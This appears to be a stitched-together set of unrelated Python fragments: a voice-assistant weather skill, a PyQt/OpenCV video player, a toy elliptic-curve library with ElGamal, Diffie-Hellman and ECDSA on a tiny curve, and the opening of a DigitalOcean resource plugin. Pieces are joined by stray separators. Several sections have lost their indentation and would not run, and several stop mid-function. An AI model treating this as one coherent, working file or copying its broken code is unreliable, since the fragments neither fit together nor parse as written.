    "Cloudy").optionally("Location").build())
def handle_isit_cloudy(self, message):
    """ Handler for utterances similar to "is it cloudy today?"
    """
    report = self.__populate_report(message)
    # BUG FIX: __populate_report() returns None on failure; guard
    # before subscripting it.  (Docstring also fixed: it was a
    # copy-paste of the clear-skies handler.)
    if report is None:
        return
    if self.voc_match(report['condition'], 'Cloudy'):
        dialog = 'affirmative.condition'
    elif self.voc_match(report['condition'], 'CloudyAlternatives'):
        dialog = 'cloudy.alternative'
    else:
        dialog = 'no.cloudy.predicted'
    # Prefix selection: local vs named location, current vs forecast.
    if "Location" not in message.data:
        dialog = 'local.' + dialog
    if report.get('day'):
        dialog = 'forecast.' + dialog
    self.speak_dialog(dialog, report)
@intent_handler(IntentBuilder("").require("ConfirmQuery").one_of(
    "Foggy").optionally("Location").build())
def handle_isit_foggy(self, message):
    """ Handler for utterances similar to "is it foggy today?"
    """
    report = self.__populate_report(message)
    # BUG FIX: __populate_report() returns None on failure; guard
    # before subscripting it.
    if report is None:
        return
    if self.voc_match(report['condition'], 'Foggy'):
        dialog = 'affirmative.condition'
    elif self.voc_match(report['condition'], 'FoggyAlternatives'):
        dialog = 'fog.alternative'
    else:
        dialog = 'no.fog.predicted'
    # Prefix selection: local vs named location, current vs forecast.
    if "Location" not in message.data:
        dialog = 'local.' + dialog
    if report.get('day'):
        dialog = 'forecast.' + dialog
    self.speak_dialog(dialog, report)
@intent_handler(IntentBuilder("").require("ConfirmQuery").one_of(
    "Raining").optionally("Location").build())
def handle_isit_raining(self, message):
    """ Handler for utterances similar to "is it raining today?"
    """
    report = self.__populate_report(message)
    # BUG FIX: __populate_report() returns None on failure; guard
    # before subscripting it.  (Docstring also fixed: it was a
    # copy-paste of the snowing handler.)
    if report is None:
        return
    if self.voc_match(report['condition'], 'Raining'):
        dialog = 'affirmative.condition'
    elif self.voc_match(report['condition'], 'RainAlternatives'):
        dialog = 'raining.alternative'
    else:
        dialog = 'no.rain.predicted'
    # Prefix selection: local vs named location, current vs forecast.
    if "Location" not in message.data:
        dialog = 'local.' + dialog
    if report.get('day'):
        dialog = 'forecast.' + dialog
    self.speak_dialog(dialog, report)
def __handle_typed(self, message, response_type):
    """Fetch current weather (or a forecast) and speak a report of the
    given *response_type* ('temperature', 'high.temperature', ...).

    All errors are handled here: API errors go to __api_error(),
    anything else is logged.
    """
    try:
        unit = self.__get_requested_unit(message)
        # Get a date from requests like "weather for next Tuesday"
        today = extract_datetime(" ")[0]
        # NOTE(review): this unpacks three values from
        # extract_datetime(); older mycroft/lingua-franca versions
        # return a 2-tuple -- confirm against the pinned version.
        when, _, _ = extract_datetime(
            message.data.get('utterance'), lang=self.lang)
        report = self.__initialize_report(message)
        # A date other than today means the user asked for a forecast.
        if today != when:
            LOG.info("Doing a forecast" + str(today) + " " + str(when))
            return self.report_forecast(report, when,
                                        dialog=response_type)
        # Get current conditions
        currentWeather = self.owm.weather_at_place(
            report['full_location'], report['lat'],
            report['lon']).get_weather()
        # Change encoding of the localized report to utf8 if needed
        condition = currentWeather.get_detailed_status()
        if self.owm.encoding != 'utf8':
            condition = self.__translate(
                condition.encode(self.owm.encoding).decode('utf8')
            )
        report['condition'] = condition
        report['temp'] = pronounce_number(int(self.__get_temperature(currentWeather, 'temp',
                                                                     unit)), self.lang)
        report['icon'] = currentWeather.get_weather_icon_name()
        # Get forecast for the day
        # can get 'min', 'max', 'eve', 'morn', 'night', 'day'
        # Set time to 12 instead of 00 to accomodate for timezones
        forecastWeather = self.__get_forecast(
            today.replace(
                hour=12),
            report['full_location'],
            report['lat'],
            report['lon'])
        report['temp_min'] = pronounce_number(int(self.__get_temperature(forecastWeather, 'min',
                                                                         unit)), self.lang)
        report['temp_max'] = pronounce_number(int(self.__get_temperature(forecastWeather, 'max',
                                                                         unit)), self.lang)
        report['humidity'] = forecastWeather.get_humidity()
        wind = self.get_wind_speed(forecastWeather)
        report['wind'] = "{} {}".format(wind[0], wind[1] or "")
        self.__report_weather('current', report, response_type)
        self.mark2_forecast(report)
    except HTTPError as e:
        self.__api_error(e)
    except Exception as e:
        LOG.exception("Error: {0}".format(e))
def __populate_report(self, message):
    """Build a weather-report dict for the request in *message*.

    Returns the populated dict, or None when the lookup failed
    (errors are logged / dispatched to __api_error() here).
    """
    try:
        unit = self.__get_requested_unit(message)
        # Get a date from requests like "weather for next Tuesday"
        today = extract_datetime(" ")[0]
        # NOTE(review): this unpacks three values from
        # extract_datetime(); older mycroft/lingua-franca versions
        # return a 2-tuple -- confirm against the pinned version.
        when, _, _ = extract_datetime(
            message.data.get('utterance'), lang=self.lang)
        report = self.__initialize_report(message)
        # A date other than today means the user asked for a forecast.
        if today != when:
            LOG.info("Doing a forecast" + str(today) + " " + str(when))
            return self.__populate_forecast(report, when)
        # Get current conditions
        currentWeather = self.owm.weather_at_place(
            report['full_location'], report['lat'],
            report['lon']).get_weather()
        # Change encoding of the localized report to utf8 if needed
        condition = currentWeather.get_detailed_status()
        if self.owm.encoding != 'utf8':
            condition = self.__translate(
                condition.encode(self.owm.encoding).decode('utf8')
            )
        report['condition'] = condition
        report['temp'] = pronounce_number(int(self.__get_temperature(currentWeather, 'temp',
                                                                     unit)), self.lang)
        report['icon'] = currentWeather.get_weather_icon_name()
        # Get forecast for the day
        # can get 'min', 'max', 'eve', 'morn', 'night', 'day'
        # Set time to 12 instead of 00 to accomodate for timezones
        forecastWeather = self.__get_forecast(
            today.replace(
                hour=12),
            report['full_location'],
            report['lat'],
            report['lon'])
        report['temp_min'] = pronounce_number(int(self.__get_temperature(forecastWeather, 'min',
                                                                         unit)), self.lang)
        report['temp_max'] = pronounce_number(int(self.__get_temperature(forecastWeather, 'max',
                                                                         unit)), self.lang)
        report['humidity'] = forecastWeather.get_humidity()
        # Replace known city identifiers with Arabic display names.
        if report['location'] == 'london, gb':
            report['location'] = 'لندن'
        elif report['location'] == 'cairo, eg':
            report['location'] = 'القاهرة'
        elif report['location'] == 'dubai, ae':
            report['location'] = 'دبي'
        elif report['location'] == 'riyadh, sa':
            report['location'] = 'الرياض'
        elif report['location'] == 'jeddah, sa':
            report['location'] = 'جده'
        # NOTE(review): this key is capitalized unlike the others;
        # the comparison is case-sensitive -- confirm this is intended.
        elif report['location'] == 'Washington, US':
            report['location'] = 'واشنطن'
        elif report['location'] == 'mecca, sa':
            report['location'] = 'مكه'
        wind = self.get_wind_speed(forecastWeather)
        report['wind'] = "{} {}".format(wind[0], wind[1] or "")
        return report
    except HTTPError as e:
        self.__api_error(e)
    except Exception as e:
        LOG.exception("Error: {0}".format(e))
    return None
def __populate_forecast(self, report, when, unit=None):
""" Populate the report and return it.
Arguments:
report (dict): report base
when : date for report
unit: Unit type to use when presenting
Returns: None if no report available otherwise dict with weather info
"""
forecast_weather = self.__get_forecast(
when, report['full_location'], report['lat'], report['lon'])
if forecast_weather is None:
return None # No forecast available
# Can get temps for 'min', 'max', 'eve', 'morn', 'night', 'day'
report['temp'] = pronounce_number(int(self.__get_temperature(forecast_weather, 'day', unit)),self.lang)
report['temp_min'] = pronounce_number(int(self.__get_temperature(forecast_weather, 'min',
unit)),self.lang)
report['temp_max'] = pronounce_number(int(self.__get_temperature(forecast_weather, 'max',
unit)),self.lang)
report['icon'] = forecast_weather.get_weather_icon_name()
report['humidity'] = forecast_weather.get_humidity()
if report['location']=='london, gb':
report['location'] = 'لندن'
elif report['location']=='cairo, eg':
report['location'] = 'القاهرة'
elif report['location']=='dubai, ae':
report['location'] = 'دبي'
elif report['location']=='riyadh, sa':
report['location'] = 'الرياض'
elif report['location']=='jeddah, sa':
report['location'] = 'جده'
elif report['location']=='Washington, US':
report['location'] = 'واشنطن'
elif report['location']=='mecca, sa':
report['location'] = 'مكه'
"""report['wind'] = self.get_wind_speed(forecast_weather)[0]"""
# TODO: Run off of status IDs instead of the status text? This converts a status like "sky is clear" to
# a different text and tense, because you don't want: "Friday it will be 82 and the sky is clear", it
# should be 'Friday it will be 82 and the sky will be clear' or just 'Friday it will be 82 and clear.
report['condition'] = self.__translate(
forecast_weather.get_detailed_status(), True)
report['day'] = self.__to_day(when) # Tuesday, tomorrow, etc.
return report
def report_forecast(self, report, when, dialog='weather', unit=None):
""" Speak forecast for specific day.
Arguments:
report (dict): report base
when : date for report
dialog (str): dialog type, defaults to 'weather'
unit: Unit type to use when presenting
"""
report = self.__populate_forecast(report, when, unit)
if report is None:
self.speak_dialog("no forecast", {'day': self.__to_day(when)})
return
self.__report_weather('forecast', report, rtype=dialog)
def report_threeday_forecast(self, report, dialog='weather', unit=None):
""" Speak forecast for today, tomorrow and next day.
Arguments:
report (dict): report base
when : date for report
dialog (str): dialog type, defaults to 'weather'
unit: Unit type to use when presenting
"""
days = [extract_datetime(" ")[0],
extract_datetime("tomorrow", lang="en-us")[0],
extract_datetime("48 hours", lang="en-us")[0]]
for day in days:
report = self.__populate_forecast(report, day, unit)
if report is None:
self.speak_dialog("no forecast", {'day': self.__to_day(day)})
return
self.__report_weather('forecast', report, rtype=dialog)
# Handle: When will it rain again? | Will it rain on Tuesday?
@intent_handler(IntentBuilder("").require("Query").require(
"Next").require("Precipitation").optionally("Location").build())
def handle_next_precipitation(self, message):
report = self.__initialize_report(message)
# Get a date from spoken request
today = extract_datetime(" ")[0]
when = extract_datetime(message.data.get('utterance'),
lang=self.lang)[0]
# search the forecast for precipitation
for weather in self.owm.daily_forecast(
report['full_location'],
report['lat'],
report['lon'], 10).get_forecast().get_weathers():
forecastDate = datetime.fromtimestamp(weather.get_reference_time())
if when != today:
# User asked about a specific date, | |
if the thread has been requested to terminate or not.
"""
lock = QReadLocker(self._lock)
return self._teminationFlag
#---------------------------------------------
def fps(self):
"""
Gets the Frame Rate of the video currently opened.
Returns
-------
fps: int
Value of the Frame Rate (in frames per second) of the video opened
or -1 if no video is opened.
"""
lock = QReadLocker(self._lock)
return self._fps
#---------------------------------------------
def totalFrames(self):
"""
Gets the total number of frames in the video currently opened.
Returns
-------
total: int
Total number of frames in the video opened or 0 if no video is
opened.
"""
lock = QReadLocker(self._lock)
return self._totalFrames
#---------------------------------------------
def _getFrame(self):
"""
Gets the next frame of the video to display.
Returns
-------
position: int
Number of the frame read, or -1 if failed.
frame: numpy.ndarray
Image of the frame read, or None if failed.
"""
if self.mediaStatus() != MediaStatus.Opened:
return -1, None
lock = QWriteLocker(self._lock)
ret, frame = self._video.read()
if not ret:
return -1, None
else:
self._currentFrame += 1
return self._currentFrame, frame
#---------------------------------------------
def mediaStatus(self):
"""
Thread-save read access to the media status.
Returns
-------
status: MediaStatus
Value of the current media status.
"""
lock = QReadLocker(self._lock)
return self._mediaStatus
#---------------------------------------------
def setMediaStatus(self, status):
"""
Thread-save write access to the media status.
Parameters
----------
status: MediaStatus
Value to update the media status to.
"""
lock = QWriteLocker(self._lock)
self._mediaStatus = status
#---------------------------------------------
def playbackStatus(self):
"""
Thread-save read access to the playback status.
Returns
-------
status: PlaybackStatus
Value of the current playback status.
"""
lock = QReadLocker(self._lock)
return self._playbackStatus
#---------------------------------------------
def setPlaybackStatus(self, status):
"""
Thread-save write access to the playback status.
Parameters
----------
status: PlaybackStatus
Value to update the playback status to.
"""
lock = QWriteLocker(self._lock)
self._playbackStatus = status
#---------------------------------------------
def open(self, fileName):
"""
Opens the given video for playing.
Parameter
---------
fileName: str
Path and name of the video file to open.
Returns
-------
ret: bool
Indication of success in opening the video file.
"""
video = cv2.VideoCapture(fileName)
if video is None:
return False
lock = QWriteLocker(self._lock)
if self._video is not None:
self._video.release()
self._video = video
self._videoFileName = fileName
self._fps = self._video.get(cv2.CAP_PROP_FPS)
self._currentFrame = -1
self._totalFrames = self._video.get(cv2.CAP_PROP_FRAME_COUNT)
self._mediaStatus = MediaStatus.Opened
self._playbackStatus = PlaybackStatus.Stopped
self.opened.emit(self._totalFrames)
return True
#---------------------------------------------
def close(self):
"""
Closes the currently opened video file.
"""
if self.mediaStatus() == MediaStatus.Opened:
lock = QWriteLocker(self._lock)
self._playbackStatus = PlaybackStatus.Stopped
self._medisStatus = MediaStatus.Closed
self._fps = 0
self._totalFrames = 0
self._currentFrame = -1
self._video.release()
self._videoFileName = ""
self.closed.emit()
#---------------------------------------------
def play(self):
"""
Plays the currently opened video.
"""
if self.playbackStatus() != PlaybackStatus.Playing:
self.setPlaybackStatus(PlaybackStatus.Playing)
#---------------------------------------------
def pause(self):
"""
Pauses the currently opened video.
"""
if self.playbackStatus() not in (PlaybackStatus.Paused,
PlaybackStatus.Stopped):
self.setPlaybackStatus(PlaybackStatus.Paused)
#---------------------------------------------
def stop(self):
"""
Stops the currently opened video.
"""
if self.playbackStatus() != PlaybackStatus.Stopped:
self.setPlaybackStatus(PlaybackStatus.Stopped)
#---------------------------------------------
def seek(self, position):
"""
Seeks the video, going to the given frame position.
Parameters
----------
position: int
Position (i.e. number of the frame) where to seek the video.
"""
print('seeking to {}'.format(position))
if self.mediaStatus() != MediaStatus.Opened:
return
lock = QWriteLocker(self._lock)
self._video.set(cv2.CAP_PROP_POS_FRAMES, position)
self._currentFrame = self._video.get(cv2.CAP_PROP_POS_FRAMES) - 1
#---------------------------------------------
def run(self):
"""
Runs the threaded processing of the video.
It is important to remember that this is the only method that, in fact,
runs in a different thread. All other methods will run in the same
thread of the GUI.
"""
while not self.isTerminated():
start = datetime.now()
status = self.playbackStatus()
if status == PlaybackStatus.Playing:
pos, frame = self._getFrame()
if frame is None:
self.stop()
else:
self.playback.emit(pos, frame)
end = datetime.now()
elapsed = (end - start)
fps = self.fps()
if fps == 0:
fps = 30
delay = int(max(1, ((1 / fps) - elapsed.total_seconds()) * 1000))
self.msleep(delay)
#=============================================
class VideoWidget(QWidget):
    """
    Composite widget that presents the contents of a video read with the
    VideoPlayer class: a frame display stacked over a progress slider.
    """
    #---------------------------------------------
    def __init__(self, player, parent = None):
        """
        Class constructor.
        Parameters
        ----------
        player: VideoPlayer
            Instance of the video player used to read the video.
        parent: QWidget
            Parent widget. The default is None.
        """
        super().__init__(parent)
        # Video player driving this widget.
        self._player = player
        # Widget that renders the individual video frames.
        self._frame = VideoFrameWidget(self)
        # Slider displaying and controlling the playback progress.
        self._slider = VideoSliderWidget(self)
        # Wire the player and slider signals to this widget's slots.
        self._player.opened.connect(self.opened)
        self._player.closed.connect(self.closed)
        self._player.playback.connect(self.playback)
        self._slider.positionChanged.connect(self._positionChanged)
        # Stack the frame display above the slider with no margins.
        layout = QVBoxLayout()
        self.setLayout(layout)
        layout.setContentsMargins(0, 0, 0, 0)
        layout.addWidget(self._frame)
        layout.addWidget(self._slider)
        self.setMinimumSize(self.sizeHint())
        # The slider stays disabled until a video is opened.
        self._slider.setEnabled(False)
    #---------------------------------------------
    def sizeHint(self):
        """
        Gets the preferred size for this widget.
        Returns
        -------
        size: QSize
            Preferred size of the widget.
        """
        return QSize(256, 144)
    #---------------------------------------------
    def opened(self, totalFrames):
        """
        Captures the opened signal from the VideoPlayer class.
        """
        # A new video is available: size the slider to it and enable it.
        self._slider.setMax(totalFrames)
        self._slider.setPosition(0)
        self._slider.setEnabled(True)
    #---------------------------------------------
    def closed(self):
        """
        Captures the closed signal from the VideoPlayer class.
        """
        # Clear the display and disable the slider again.
        self._frame.setFrame(None)
        self._slider.setPosition(0)
        self._slider.setEnabled(False)
    #---------------------------------------------
    def playback(self, position, frame):
        """
        Captures the playback signal from the VideoPlayer class.
        Parameters
        ----------
        position: int
            Number of the frame in the video to display.
        frame: numpy.ndarray
            Image of the frame to display.
        """
        self._frame.setFrame(frame)
        self._slider.setPosition(position)
    #---------------------------------------------
    def _positionChanged(self, position):
        """
        Captures the position changed signal emitted by the slider in order
        to position the video playing.
        Parameters
        ----------
        position: int
            Position (frame number) where to seek the video to.
        """
        self._player.seek(position)
#=============================================
class VideoFrameWidget(QWidget):
    """
    Implements the displayer of video frames used by the VideoWidget class.
    """
    #---------------------------------------------
    def __init__(self, parent = None):
        """
        Class constructor.
        Parameters
        ----------
        parent: QWidget
            Parent widget. The default is None.
        """
        super().__init__(parent)
        # QImage currently displayed (None when nothing is shown).
        self._image = None
        # The widget paints its whole area itself (black background).
        self.setAutoFillBackground(False)
        self.setAttribute(Qt.WA_NoSystemBackground, True)
    #---------------------------------------------
    def setFrame(self, frame):
        """
        Sets the image of the video frame to display.
        Parameters
        ----------
        frame: numpy.ndarray
            OpenCV's image of the video frame to be displayed, or None to
            clear the display.
        """
        # Fix: VideoWidget.closed() calls setFrame(None); reading
        # frame.shape on None raised AttributeError. Clear instead.
        if frame is None:
            self._image = None
        else:
            height, width, channels = frame.shape
            bytesPerLine = channels * width
            # OpenCV delivers BGR; QImage expects RGB byte order.
            frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
            self._image = QImage(frame, width, height, bytesPerLine,
                                 QImage.Format_RGB888)
        self.repaint()
    #---------------------------------------------
    def paintEvent(self, event):
        """
        Captures the paint event in order to draw the video frame.
        """
        painter = QPainter(self)
        painter.fillRect(event.rect(), Qt.black)
        if self._image is not None:
            # Scale preserving aspect ratio and center inside the widget.
            size = self.size()
            image = self._image.scaled(size, Qt.KeepAspectRatio,
                                       Qt.SmoothTransformation)
            x = self.width() // 2 - image.width() // 2
            y = self.height() // 2 - image.height() // 2
            painter.drawImage(x, y, image)
#=============================================
class CustomSlider(QSlider):
"""
A custom slider with a nice style sheet and with jump clicking implemented.
"""
#---------------------------------------------
    def __init__(self, parent = None):
        """
        Class constructor.
        Parameters
        ----------
        parent: QWidget
            Parent widget. The default is None.
        """
        # Horizontal slider; range/page-step are defaults overridden by users.
        super(CustomSlider, self).__init__(Qt.Horizontal, parent)
        self.setRange(0, 100)
        self.setPageStep(10)
        # Style sheet giving the groove, handle and filled section a soft
        # teal look, with separate muted colors for the disabled state.
        self.setStyleSheet(
            'QSlider::groove:horizontal'
            '{'
            '   border: 1px solid #bbb;'
            '   background: white;'
            '   height: 10px;'
            '   border-radius: 4px;'
            '}'
            ''
            'QSlider::sub-page:horizontal'
            '{'
            '   background: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1, '
            '      stop: 0 #669999, stop: 1 #d1e0e0);'
            '   background: qlineargradient(x1: 0, y1: 0.2, x2: 1, y2: 1, '
            '       stop: 0 #d1e0e0, stop: 1 #85adad);'
            '   border: 1px solid #777;'
            '   height: 10px;'
            '   border-radius: 4px;'
            '}'
            ''
            'QSlider::add-page:horizontal'
            '{'
            '   background: #fff;'
            '   border: 1px solid #777;'
            '   height: 10px;'
            '   border-radius: 4px;'
            '}'
            ''
            'QSlider::handle:horizontal'
            '{'
            '   background: qlineargradient(x1:0, y1:0, x2:1, y2:1, '
            '       stop:0 #eee, stop:1 #ccc);'
            '   border: 1px solid #777;'
            '   width: 30px;'
            '   margin-top: -2px;'
            '   margin-bottom: -2px;'
            '   border-radius: 5px;'
            '}'
            ''
            'QSlider::handle:horizontal:hover'
            '{'
            '   background: qlineargradient(x1:0, y1:0, x2:1, y2:1,'
            '       stop:0 #fff, stop:1 #ddd);'
            '   border: 1px solid #444;'
            '   border-radius: 5px;'
            '}'
            ''
            'QSlider::sub-page:horizontal:disabled'
            '{'
            '   background: #bbb;'
            '   border-color: #999;'
            '}'
            ''
            'QSlider::add-page:horizontal:disabled'
            '{'
            '   background: #eee;'
            '   border-color: #999;'
            '}'
            ''
            'QSlider::handle:horizontal:disabled'
            '{'
            '   background: #eee;'
            '   border: 1px solid #aaa;'
            '   border-radius: 4px;'
            '}'
        )
#---------------------------------------------
def mousePressEvent(self, event):
"""
Captures the mouse press event to implement the jump click (i.e. allows
the handle to jump to the position clicked by the user instead of
emulating a page-up or page-down - the default behavior).
Parameters
----------
event: QMousePressEvent
Object with the event received.
"""
opt = QStyleOptionSlider()
self.initStyleOption(opt)
handleRect = self.style().subControlRect(QStyle.CC_Slider, opt,
QStyle.SC_SliderHandle, self)
if event.button() == Qt.LeftButton and \
not handleRect.contains(event.pos()):
halfHandleWidth = (0.5 * handleRect.width()) + 0.5
adaptedPosX = event.x()
| |
import collections
def inv(n, q):
    """Modular inverse on PN: a/b mod q is computed as a * inv(b, q) mod q.

    >>> assert n * inv(n, q) % q == 1
    """
    # egcd(n, q) yields (s, t, 1) with n*s + q*t == 1, so n*s == 1 (mod q)
    # and s reduced mod q is the inverse of n.
    s, _, _ = egcd(n, q)
    return s % q
def egcd(a, b):
    """Extended Euclidean algorithm.

    returns: (s, t, gcd) as a*s + b*t == gcd
    >>> s, t, gcd = egcd(a, b)
    >>> assert a % gcd == 0 and b % gcd == 0
    >>> assert a * s + b * t == gcd
    """
    # Iterative Bezout computation: (prev_s, prev_t) track the coefficients
    # for the current remainder `a`, (s, t) for the next remainder `b`.
    prev_s, s = 1, 0
    prev_t, t = 0, 1
    while b > 0:
        quot, rem = divmod(a, b)
        a, b = b, rem
        prev_s, s = s, prev_s - quot * s
        prev_t, t = t, prev_t - quot * t
    return prev_s, prev_t, a
def sqrt(n, q):
    """sqrt on PN modulo: returns two numbers or exception if not exist

    >>> assert (sqrt(n, q)[0] ** 2) % q == n
    >>> assert (sqrt(n, q)[1] ** 2) % q == n
    """
    assert n < q
    # Exhaustive search — acceptable for the tiny prime moduli used in the
    # examples; the two roots of n are always r and q - r.
    for root in range(1, q):
        if root * root % q == n:
            return root, q - root
    raise Exception("not found")
# Point on the curve; EC reserves Coord(0, 0) as its ZERO (identity) value.
Coord = collections.namedtuple("Coord", ["x", "y"])
class EC(object):
    """System of Elliptic Curve over the prime field mod q."""
    def __init__(self, a, b, q):
        """elliptic curve as: (y**2 = x**3 + a * x + b) mod q
        - a: curve parameter; may be 0 (curves of the form y^2 = x^3 + b)
        - b: curve parameter; must be non-zero because Coord(0, 0) is
          reserved as the ZERO sentinel, and with b == 0 the point (0, 0)
          would actually satisfy the curve equation
        - q: prime number
        """
        # Generalized from `0 < a` to `0 <= a`: a == 0 is a valid parameter
        # as long as the discriminant check below still holds.
        assert 0 <= a and a < q and 0 < b and b < q and q > 2
        # Non-singularity: discriminant 4a^3 + 27b^2 must not vanish mod q.
        assert (4 * (a ** 3) + 27 * (b ** 2)) % q != 0
        self.a = a
        self.b = b
        self.q = q
        # just as unique ZERO value representation for "add": (not on curve)
        self.zero = Coord(0, 0)
    def is_valid(self, p):
        """Check that p is either ZERO or satisfies the curve equation."""
        if p == self.zero: return True
        l = (p.y ** 2) % self.q
        r = ((p.x ** 3) + self.a * p.x + self.b) % self.q
        return l == r
    def at(self, x):
        """find points on curve at x
        - x: int < q
        - returns: ((x, y), (x,-y)) or not found exception
        >>> a, ma = ec.at(x)
        >>> assert a.x == ma.x and a.x == x
        >>> assert ec.neg(a) == ma
        >>> assert ec.is_valid(a) and ec.is_valid(ma)
        """
        assert x < self.q
        ysq = (x ** 3 + self.a * x + self.b) % self.q
        y, my = sqrt(ysq, self.q)
        return Coord(x, y), Coord(x, my)
    def neg(self, p):
        """negate p
        >>> assert ec.is_valid(ec.neg(p))
        """
        return Coord(p.x, -p.y % self.q)
    def add(self, p1, p2):
        """<add> of elliptic curve: negate of 3rd cross point of (p1,p2) line
        >>> d = ec.add(a, b)
        >>> assert ec.is_valid(d)
        >>> assert ec.add(d, ec.neg(b)) == a
        >>> assert ec.add(a, ec.neg(a)) == ec.zero
        >>> assert ec.add(a, b) == ec.add(b, a)
        >>> assert ec.add(a, ec.add(b, c)) == ec.add(ec.add(a, b), c)
        """
        # ZERO is the group identity.
        if p1 == self.zero: return p2
        if p2 == self.zero: return p1
        if p1.x == p2.x and (p1.y != p2.y or p1.y == 0):
            # p1 + -p1 == 0
            return self.zero
        if p1.x == p2.x:
            # p1 + p1: use tangent line of p1 as (p1,p1) line
            l = (3 * p1.x * p1.x + self.a) * inv(2 * p1.y, self.q) % self.q
        else:
            # distinct points: slope of the chord through p1 and p2
            l = (p2.y - p1.y) * inv(p2.x - p1.x, self.q) % self.q
        x = (l * l - p1.x - p2.x) % self.q
        y = (l * (p1.x - x) - p1.y) % self.q
        return Coord(x, y)
    def mul(self, p, n):
        """n times <mul> of elliptic curve
        >>> m = ec.mul(p, n)
        >>> assert ec.is_valid(m)
        >>> assert ec.mul(p, 0) == ec.zero
        """
        r = self.zero
        m2 = p
        # double-and-add: O(log2(n)) group additions
        while 0 < n:
            if n & 1 == 1:
                r = self.add(r, m2)
            n, m2 = n >> 1, self.add(m2, m2)
        return r
    def order(self, g):
        """order of point g
        >>> o = ec.order(g)
        >>> assert ec.is_valid(g) and ec.mul(g, o) == ec.zero
        >>> assert o <= ec.q
        """
        assert self.is_valid(g) and g != self.zero
        # Linear scan: fine for the small demo fields used here.
        for i in range(1, self.q + 1):
            if self.mul(g, i) == self.zero:
                return i
        raise Exception("Invalid order")
class ElGamal(object):
    """ElGamal Encryption
    pub key encryption as replacing (mulmod, powmod) to (ec.add, ec.mul)
    - ec: elliptic curve
    - g: (random) a point on ec
    """
    def __init__(self, ec, g):
        assert ec.is_valid(g)
        self.ec = ec
        self.g = g
        self.n = ec.order(g)
    def gen(self, priv):
        """generate pub key
        - priv: priv key as (random) int < ec.q
        - returns: pub key as points on ec
        """
        # Fix: was `self.ec.mul(g, priv)`, which silently used the *global*
        # name `g` (only defined in the __main__ demo) instead of self.g.
        return self.ec.mul(self.g, priv)
    def enc(self, plain, pub, r):
        """encrypt
        - plain: data as a point on ec
        - pub: pub key as points on ec
        - r: random int < ec.q
        - returns: (cipher1, cipher2) as points on ec
        """
        assert self.ec.is_valid(plain)
        assert self.ec.is_valid(pub)
        # Fix: use self.g rather than the global `g`.
        return (self.ec.mul(self.g, r), self.ec.add(plain, self.ec.mul(pub, r)))
    def dec(self, cipher, priv):
        """decrypt
        - cipher: (cipher1, cipher2) as points on ec
        - priv: private key as int < ec.q
        - returns: plain as a point on ec
        """
        c1, c2 = cipher
        # Fix: second validity check used the global `ec`, not self.ec.
        assert self.ec.is_valid(c1) and self.ec.is_valid(c2)
        return self.ec.add(c2, self.ec.neg(self.ec.mul(c1, priv)))
class DiffieHellman(object):
    """Elliptic Curve Diffie-Hellman (Key Agreement)
    - ec: elliptic curve
    - g: a point on ec
    """
    def __init__(self, ec, g):
        self.ec = ec
        self.g = g
        # Order of the base point: private keys live in (0, n).
        self.n = ec.order(g)
    def gen(self, priv):
        """generate pub key"""
        assert 0 < priv < self.n
        return self.ec.mul(self.g, priv)
    def secret(self, priv, pub):
        """calc shared secret key for the pair
        - priv: my private key as int
        - pub: partner pub key as a point on ec
        - returns: shared secret as a point on ec
        """
        # The partner's key must be a valid point of the expected order.
        assert self.ec.is_valid(pub)
        assert self.ec.mul(pub, self.n) == self.ec.zero
        return self.ec.mul(pub, priv)
class DSA(object):
    """ECDSA
    - ec: elliptic curve
    - g: a point on ec
    """
    def __init__(self, ec, g):
        self.ec = ec
        self.g = g
        # Order of the base point; all signature arithmetic is mod n.
        self.n = ec.order(g)
    def gen(self, priv):
        """generate pub key"""
        assert 0 < priv < self.n
        return self.ec.mul(self.g, priv)
    def sign(self, hashval, priv, r):
        """generate signature
        - hashval: hash value of message as int
        - priv: priv key as int
        - r: random int
        - returns: signature as (int, int)
        """
        assert 0 < r < self.n
        # R = r*G; signature is (R.x, (hash + R.x * priv) / r mod n).
        point = self.ec.mul(self.g, r)
        s = inv(r, self.n) * (hashval + point.x * priv) % self.n
        return (point.x, s)
    def validate(self, hashval, sig, pub):
        """validate signature
        - hashval: hash value of message as int
        - sig: signature as (int, int)
        - pub: pub key as a point on ec
        """
        assert self.ec.is_valid(pub)
        assert self.ec.mul(pub, self.n) == self.ec.zero
        w = inv(sig[1], self.n)
        u1 = hashval * w % self.n
        u2 = sig[0] * w % self.n
        p = self.ec.add(self.ec.mul(self.g, u1), self.ec.mul(pub, u2))
        return p.x % self.n == sig[0]
if __name__ == "__main__":
    # shared elliptic curve system of examples
    ec = EC(1, 18, 19)
    g, _ = ec.at(7)
    assert ec.order(g) <= ec.q
    # ElGamal enc/dec usage
    eg = ElGamal(ec, g)
    # mapping value to ec point
    # "masking": value k to point ec.mul(g, k)
    # ("imbedding" on proper n:use a point of x as 0 <= n*v <= x < n*(v+1) < q)
    mapping = [ec.mul(g, i) for i in range(eg.n)]
    plain = mapping[7]
    priv = 5
    pub = eg.gen(priv)
    cipher = eg.enc(plain, pub, 15)
    decoded = eg.dec(cipher, priv)
    # round trip: decryption must recover the original point
    assert decoded == plain
| |
from dataclasses import dataclass
from typing import ClassVar, Dict, List, Optional
import resotolib.logger
from resotolib.baseresources import (
BaseAccount,
BaseDatabase,
BaseInstance,
BaseIPAddress,
BaseLoadBalancer,
BaseNetwork,
BaseRegion,
BaseResource,
BaseSnapshot,
BaseVolume,
InstanceStatus,
VolumeStatus,
BaseBucket,
BaseEndpoint,
BaseCertificate,
BaseKeyPair,
BaseDomain,
BaseDomainRecord,
)
from resotolib.graph import Graph
from resoto_plugin_digitalocean.client import get_team_credentials
from resoto_plugin_digitalocean.client import StreamingWrapper
from .utils import dump_tag
log = resotolib.logger.getLogger("resoto." + __name__)
@dataclass(eq=False)
class DigitalOceanResource(BaseResource): # type: ignore
    """A class that implements the abstract method delete() as well as update_tag()
    and delete_tag().
    delete() must be implemented. update_tag() and delete_tag() are optional.
    """
    kind: ClassVar[str] = "digitalocean_resource"
    # DigitalOcean URN identifying the resource.
    urn: str = ""
    def delete_uri_path(self) -> Optional[str]:
        """API path used by delete(); None means deletion is unsupported."""
        return None
    def tag_resource_name(self) -> Optional[str]:
        """Resource name in case tagging is supported by digitalocean.
        Not all resources support tagging.
        """
        return None
    def delete(self, graph: Graph) -> bool:
        """Delete a resource in the cloud"""
        delete_uri_path = self.delete_uri_path()
        if delete_uri_path:
            log.debug(
                f"Deleting resource {self.id} in account {self.account(graph).id} region {self.region(graph).id}"
            )
            # Credentials are looked up per owning team (account).
